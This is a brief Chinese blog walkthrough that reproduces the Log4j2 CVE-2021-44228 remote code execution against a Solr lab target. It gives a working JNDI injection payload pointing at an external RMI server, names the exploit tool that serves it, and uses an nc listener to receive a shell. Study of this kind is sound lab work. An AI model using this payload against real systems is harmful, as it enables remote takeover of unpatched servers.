阿一网络安全之log4j2漏洞CVE-2021-44228复现

漏洞简介

Apache Log4j 2 是对 Log4j 的升级,它⽐其前身 Log4j 1.x 提供了显 着改进,并提供了 Logback 中可⽤的许多改进,同时修复了 Logback 架构中的⼀些固有问题。
2021 年 12 ⽉,在 Apache Log4j2 中发现了⼀个 0-day 漏洞。
Log4j 的 JNDI ⽀持并没有限制可以解析的名称。⼀些协议像rmi:和 ldap:是不安全的或者可以允许远程代码执⾏。

开启靶场


JNDI-Injection-Exploit-1.0.jar 开启 RMI 服务


在 url 中插⼊构造的 payload
http://192.168.121.129:8983/solr/admin/cores? action=${jndi:rmi://116.62.17.187:1099/qdz3ly}
开启 nc 监听,成功 getshell

其实很简单,大家加油。

相关推荐
你不知道我是谁?1 小时前
AI 应用于进攻性安全
人工智能·安全
薄荷椰果抹茶2 小时前
【网络安全基础】第一章---引言
安全·网络安全
zskj_zhyl4 小时前
智绅科技:以科技为翼,构建养老安全守护网
人工智能·科技·安全
zsq4 小时前
【网络与系统安全】域类实施模型DTE
网络·安全·系统安全
缘友一世6 小时前
网安系列【4】之OWASP与OWASP Top 10:Web安全入门指南
安全·web安全
HMS Core7 小时前
HarmonyOS免密认证方案 助力应用登录安全升级
安全·华为·harmonyos
Gauss松鼠会8 小时前
GaussDB权限管理:从RBAC到精细化控制的企业级安全实践
大数据·数据库·安全·database·gaussdb
小赖同学啊10 小时前
基于区块链的物联网(IoT)安全通信与数据共享的典型实例
物联网·安全·区块链
安全系统学习17 小时前
网络安全之SQL RCE漏洞
安全·web安全·网络安全·渗透测试
聚铭网络1 天前
案例精选 | 某省级税务局AI大数据日志审计中台应用实践
大数据·人工智能·web安全